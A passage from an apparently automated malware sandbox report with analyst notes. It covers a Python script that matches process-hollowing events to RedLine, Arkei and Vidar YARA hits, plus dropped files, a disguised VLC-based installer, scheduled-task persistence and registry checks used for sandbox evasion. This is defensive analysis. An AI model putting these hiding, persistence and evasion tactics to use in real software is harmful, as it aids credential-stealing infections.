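    6080: "hDp_Q0M7VwC0FF7WWvUBtdbN.exe", 3952: "hDp_Q0M7VwC0FF7WWvUBtdbN.exe",
    4292: "aOiJ03mSE4lRy3Tw5uB0q43R.exe", 5112: "2841347.scr",
    864: "A5SgmahwE9hpMlGs6aKgdDtn.exe", 6176: "cmd.exe",
    2824: "Conhost.exe", 4588: "E804.exe",
}

# (yara rule, resource) from the payload tables (subset).
YARA_HITS = [
    ("family_redline", "behavioral4/files/0x000300000002b1d2-265.dat"),
    ("family_redline", "behavioral4/memory/6052-377-0x0000000000000000-mapping.dmp"),
    ("family_redline", "behavioral4/memory/3952-476-0x0000000005080000-0x0000000005698000-memory.dmp"),
    ("family_arkei", "behavioral4/memory/3200-473-0x0000000000400000-0x000000000047C000-memory.dmp"),
    ("family_vidar", "behavioral4/memory/1288-220-0x0000000002710000-0x00000000027AD000-memory.dmp"),
]

ROW_RE = re.compile(r"PID (\d+) set thread context of (\d+) (\d+) (\S+) (\d+)")
DUMP_RE = re.compile(r"/memory/(\d+)-")  # memory resources start with the owning pid


def parse_set_thread_context(text):
    """Return one dict per row; the 'pid' column must repeat the pid in the description."""
    rows = []
    for m in ROW_RE.finditer(text):
        src, tgt, src_again, image, _procid_target = m.groups()
        if src != src_again:
            raise ValueError(f"pid column {src_again} disagrees with description pid {src}")
        rows.append({"source_pid": int(src), "target_pid": int(tgt), "source_image": image})
    return rows


def pid_from_resource(resource):
    """pid encoded in a memory-dump resource name, or None for a file resource."""
    m = DUMP_RE.search(resource)
    return int(m.group(1)) if m else None


def families_by_pid(yara_hits):
    """Map pid -> set of family rules that matched in that process's memory."""
    out = {}
    for rule, resource in yara_hits:
        pid = pid_from_resource(resource)
        if pid is not None:
            out.setdefault(pid, set()).add(rule)
    return out


def correlate_hollowing(rows_text, dropped, yara_hits):
    """For each SetThreadContext call, attach the target image and families found in its memory."""
    fam = families_by_pid(yara_hits)
    findings = []
    for row in parse_set_thread_context(rows_text):
        target_image = dropped.get(row["target_pid"])  # None when the target is not a dropped EXE
        findings.append({
            **row,
            "target_image": target_image,
            # A parent writing into a child copy of its own image is the classic self-hollowing pattern.
            "same_image": target_image == row["source_image"],
            "families": fam.get(row["target_pid"], set()),
        })
    return findings


def hollowed_pids_with_payload(findings):
    """Target pids whose memory carried a family rule, sorted."""
    return sorted(f["target_pid"] for f in findings if f["families"])


if __name__ == "__main__":
    for f in correlate_hollowing(SET_THREAD_CONTEXT_ROWS, DROPPED_EXE, YARA_HITS):
        print(f"{f['source_image']} ({f['source_pid']}) -> {f['target_image']} ({f['target_pid']})"
              f" same_image={f['same_image']} families={sorted(f['families'])}")
```

On the rows above the script reports RedLine in exactly the two same-image targets (6052 and 3952); the remaining targets have no family hit, which tells the analyst which memory dumps still need manual inspection.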
Drops file in Program Files directory (64 IoCs)
autosubplayer.exe, File created under C:\Program Files (x86)\lighteningplayer\ (57 files, paths relative to that directory):
lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
lua\intf\modules\host.luac
lua\modules\common.luac
plugins\demux\libnuv_plugin.dll
lua\http\requests\vlm.xml
plugins\demux\librawaud_plugin.dll
lua\http\images\Video-48.png
plugins\audio_output\libamem_plugin.dll
plugins\control\libntservice_plugin.dll
lua\playlist\koreus.luac
plugins\demux\libimage_plugin.dll
plugins\spu\libmarq_plugin.dll
data_load.exe
lua\playlist\appletrailers.luac
plugins\access\libnfs_plugin.dll
plugins\demux\libps_plugin.dll
libvlc.dll
lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png
plugins\access\libhttp_plugin.dll
plugins\meta_engine\libtaglib_plugin.dll
lua\http\dialogs\stream_window.html
plugins\demux\libnsv_plugin.dll
lua\http\requests\playlist.json
plugins\misc\libvod_rtsp_plugin.dll
plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
0
lighteningplayer.exe
lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png
lua\intf\cli.luac
lua\http\images\buttons.png
plugins\demux\libvoc_plugin.dll
plugins\gui\libqt_plugin.dll
plugins\access\libdvdnav_plugin.dll
plugins\access\libftp_plugin.dll
lua\http\requests\vlm_cmd.xml
lua\intf\http.luac
plugins\lua\liblua_plugin.dll
plugins\mux\libmux_asf_plugin.dll
plugins\video_splitter\libpanoramix_plugin.dll
lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
lua\http\dialogs\mosaic_window.html
plugins\access\libsftp_plugin.dll
plugins\demux\libxa_plugin.dll
lua\http\images\speaker-32.png
lua\http\js\jquery.jstree.js
plugins\access\libimem_plugin.dll
plugins\packetizer\libpacketizer_dts_plugin.dll
lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
plugins\demux\libnoseek_plugin.dll
lua\playlist\rockbox_fm_presets.luac
plugins\packetizer\libpacketizer_copy_plugin.dll
plugins\packetizer\libpacketizer_vc1_plugin.dll
lua\meta\art\03_lastfm.luac
lua\http\js\ui.js
plugins\spu\libsubsdelay_plugin.dll
lua\meta\reader\filename.luac
autosubplayer.exe, File created: C:\Program Files (x86)\temp_files
Sharefolder.exe, File created: C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe.config
powershell.exe, File opened for modification: C:\Program Files (x86)\OsCELDuBOVuk\cache.dat
powershell.exe, File opened for modification: C:\Program Files (x86)\OsCELDuBOVuk
PGyDws9ux3Lc9PjIedgVt2AC.exe, File opened for modification: C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
PGyDws9ux3Lc9PjIedgVt2AC.exe, File created: C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
data_load.exe, File created: C:\Program Files\temp_files\OsCELDuBOVuk.dll

The lighteningplayer tree is a rebranded VLC media player install (libvlc.dll with VLC's standard plugins\ and lua\ layout) used as cover. The pieces that are not VLC are data_load.exe and the file named 0 dropped into the same directory; data_load.exe then creates C:\Program Files\temp_files\OsCELDuBOVuk.dll, the same OsCELDuBOVuk name that powershell.exe touches under Program Files (x86) and that rundll32.exe registers as a scheduled task in C:\Windows\Tasks (see the Windows directory table below). PowerControl_Svc.exe is a second, separately dropped binary.
Drops file in Windows directory (44 IoCs)
msiexec.exe, File opened for modification under C:\Windows\Installer\ (23 files): MSI423D.tmp, MSI2D1D.tmp, MSI308A.tmp, MSI3522.tmp, MSI41ED.tmp, MSI2B64.tmp, MSI421D.tmp, MSI2CCD.tmp, MSI2CFD.tmp, MSI4159.tmp, MSI429D.tmp, MSI2660.tmp, MSI30CA.tmp, MSI34C3.tmp, MSI4647.tmp, MSI3261.tmp, MSI426D.tmp, MSI29FB.tmp, MSI3FE1.tmp, MSI4264.tmp, MSI2CAD.tmp, MSI300C.tmp, MSI414F.tmp
msiexec.exe, File created: C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F}
msiexec.exe, File created: C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}
msiexec.exe, File created: C:\Windows\Installer\423c0.msi (also opened for modification)
msiexec.exe, File created: C:\Windows\Installer\423c3.msi (also opened for modification)
msiexec.exe, File created: C:\Windows\Installer\inprogressinstallinfo.ipi
msiexec.exe, File opened for modification: C:\Windows\Installer\
msiexec.exe, File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
msiexec.exe, File created under C:\Windows\SystemTemp\ (8 files): ~DF396232B045D99CF2.TMP, ~DFD473E8D5C9842CF5.TMP, ~DFB6FEE22B7246B222.TMP, ~DF8DC7A43B317C3520.TMP, ~DF794AB24A2B264558.TMP, ~DF82D6B7C8E93585B0.TMP, ~DF17502374E2A6836E.TMP, ~DF83D5CD65DEBA7D52.TMP
WerFault.exe, File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp
MsiExec.exe, File created: C:\Windows\Tasks\AdvancedWindowsManager #1.job
rundll32.exe, File created: C:\Windows\Tasks\OsCELDuBOVuk.job
svchost.exe, File opened for modification: C:\Windows\Tasks\SA.DAT

The two SourceHash{GUID} files and the cached 423c0.msi and 423c3.msi are the traces of two MSI packages being installed; the GUIDs are their product codes and can be looked up under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall on the host. The two .job files in C:\Windows\Tasks are legacy scheduled tasks and are persistence in their own right, one created by the installer's custom-action host (MsiExec.exe) and one by rundll32.exe for the OsCELDuBOVuk component.
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
pid pid_target Process procid_target
5048 3872 WerFault.exe 91
5244 4544 WerFault.exe 96
5320 1288 WerFault.exe 92
2028 6104 WerFault.exe 131
1488 6040 WerFault.exe 122
1280 4212 WerFault.exe 125
4932 6088 WerFault.exe 133
4776 5244 WerFault.exe 149
6624 864 WerFault.exe 137
7052 3012 WerFault.exe 147
6028 1252 WerFault.exe 274
7160 856 WerFault.exe 278
6360 3240 WerFault.exe 280
3736 1084 WerFault.exe 284
5144 4968 WerFault.exe 287
4276 3132 WerFault.exe 294
1612 5884 WerFault.exe 334
2672 4452 WerFault.exe 277
4796 2216 WerFault.exe 353
5752 6364 WerFault.exe 363
4540 16204 WerFault.exe 383
2276 6128 WerFault.exe 392
5044 4032 WerFault.exe 405
14532 13728 WerFault.exe 486
15276 15136 WerFault.exe 525
16232 1288 WerFault.exe 539
6640 5152 WerFault.exe 542
2072 7816 WerFault.exe 559
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rPRLfhZmwXu3oXGQaqju2XrO.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rPRLfhZmwXu3oXGQaqju2XrO.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Lukykutufu.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Lukykutufu.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
6356 schtasks.exe
6788 schtasks.exe
6780 schtasks.exe
3136 schtasks.exe
7056 schtasks.exe
6816 schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
pid Process 7064 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 8420 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 63 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Lukykutufu.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Lukykutufu.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
-
Kills process with taskkill 2 IoCs
pid Process
6796 taskkill.exe
4056 taskkill.exe
-
Modifies data under HKEY_USERS 46 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe
